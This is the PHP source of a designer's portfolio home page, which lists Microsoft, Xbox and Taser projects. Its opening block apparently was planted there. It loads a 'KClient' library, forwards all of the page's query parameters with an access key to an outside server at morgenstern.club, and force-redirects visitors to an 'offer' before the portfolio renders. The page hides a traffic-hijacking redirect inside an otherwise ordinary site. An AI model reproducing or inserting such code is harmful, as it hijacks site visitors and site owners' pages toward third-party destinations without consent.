<?php
// Query params are:  

require_once dirname(__FILE__) . '/kclient.php';
$client = new KClient('https://morgenstern.club/api.php?', 'ywM7KxznL5qLr29c');
$client->sendAllParams();       // to send all params from page query
$client->forceRedirectOffer();       // redirect to offer if an offer is chosen
// $client->param('sub_id_5', '123'); // you can send any params
// $client->keyword('PASTE_KEYWORD');  // send custom keyword
// $client->currentPageAsReferrer(); // to send current page URL as click referrer
// $client->debug();              // to enable debug mode and show the errors
// $client->execute();             // request to api, show the output and continue
$client->executeAndBreak();     // to stop page execution if there is redirect or some output
?>

<!DOCTYPE HTML>
<html>
	
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Randy Huynh</title>
	<meta name="description" content="Randy Huynh is a senior visual designer at POP in Seatte, WA.">
	<meta name="robots" content="index, follow">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="keywords" content="design, visual, ux, seattle, washington, randy, huynh, designer, tech">
	<link href="https://fonts.googleapis.com/css2?family=Esteban&family=Montserrat:wght@300;600;900&display=swap" rel="stylesheet">
	<link href="css/flexboxgrid.css" rel="stylesheet">
	<link href="css/index.css" rel="stylesheet">
</head>
          
<body class="layout">
	<div class="page js-page">
		
		<?php include 'header.php' ?>
		
		<div class="wrap container-fluid">
			
			
			<!-- HERO -->
			<section class="page-section hero col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<h1>I’m a senior visual + ux designer currently at <a href="https://www.captain.tv/">Captain.tv</a> in Seattle, Washington.</h1>
			</section>
			
			
			<!-- INTRO -->
			<section class="page-section col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<hr><div class="box"></div>
					</div>
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-1">
						<div class="box"></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<div class="box"><p class="label">Intro</p></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<div class="box"><p>I love to <a href="projects/paintings/">illustrate</a>, <a href="projects/2hops/">develop</a>, model, compose, and more. I’m passionate about leveraging visual mediums to design fluent interactions and help tell cohesive stories.</p></div>
    				</div>
				</div>
			</section>
			
			
			<!-- WORK -->
			<section class="page-section col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<div class="box"><p class="sub-label">2014-2019</p></div>
					</div>
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-1">
						<div class="box"></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<div class="box"><p class="label">Work</p></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<div class="box"><p>Since graduating from the University of Washington with a Bachelors of Design in Interaction Design, I have worked on projects for clients including Microsoft, Axon, Sinclair, Intel, Starbucks, and US Bank.</p></div>
    				</div>
				</div>
			</section>
			
			<!-- Microsoft Projects -->
			<a href="projects/microsoft-gamestack-2020/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/microsoft-gamestack-2020/mgs2020-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Microsoft Game Stack 2020</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/playfab-trophy/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/playfab-trophy/playfab-trophy-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Azure PlayFab Trophies</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/microsoft-gamestack-preview/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/microsoft-gamestack-preview/mgs2019-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Microsoft Game Stack 2019</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/hacking-stem-website/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/hacking-stem-website/hacking-stem-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Microsoft Hacking STEM</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/vr-environments/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/vr-environments/xboxvr-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Xbox Virtual Reality</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/project-scorpio/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/project-scorpio/project-scorpio-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Xbox Project Scorptio</h2>
    				</div>
				</div>
			</section></a>
			
			<a href="projects/pc-gamebar/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/pc-gamebar/pc-gamebar-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Windows 10 Game Bar</h2>
    				</div>
				</div>
			</section></a>	
			
			<a href="projects/taseraxonir/"><section class="page-section thumbnail col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-4">
						<div class="box"><img class="thumbnail responsive" src="projects/taseraxonir/taseraxonir-thumbnail.png" /></div>
					</div>
    				<div class="col-lg-offset-1 col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<h2>Taser Investor Relations</h2>
    				</div>
				</div>
			</section></a>	
				
			
			<!-- ABOUT -->
			<section class="page-section col-md-offset-2 col-lg-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
				<div class="row">
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<hr><div class="box"></div>
					</div>
					<div class="col-xs-12 col-sm-12 col-md-12 col-lg-1">
						<div class="box"></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-2">
						<div class="box"><p class="label">About</p></div>
    				</div>
    				<div class="col-xs-12 col-sm-12 col-md-12 col-lg-7">
						<div class="box"><p>All works on this site are the property of my clients and are featured here with their express permission.</p></div>
    				</div>
				</div>
			</section>
			
			<!-- FOOTER -->
			<?php include 'footer.php' ?>
			
		</div>
	
	</div>
</body>
      
<script>(function() {
            document.addEventListener('DOMContentLoaded', function(e) {
              var code = document.createElement('script');
              code.src = 'js/index.js';
              var script = document.getElementsByTagName('script')[0];
              script.parentNode.insertBefore(code, script);
            });
          }());
</script>

</html>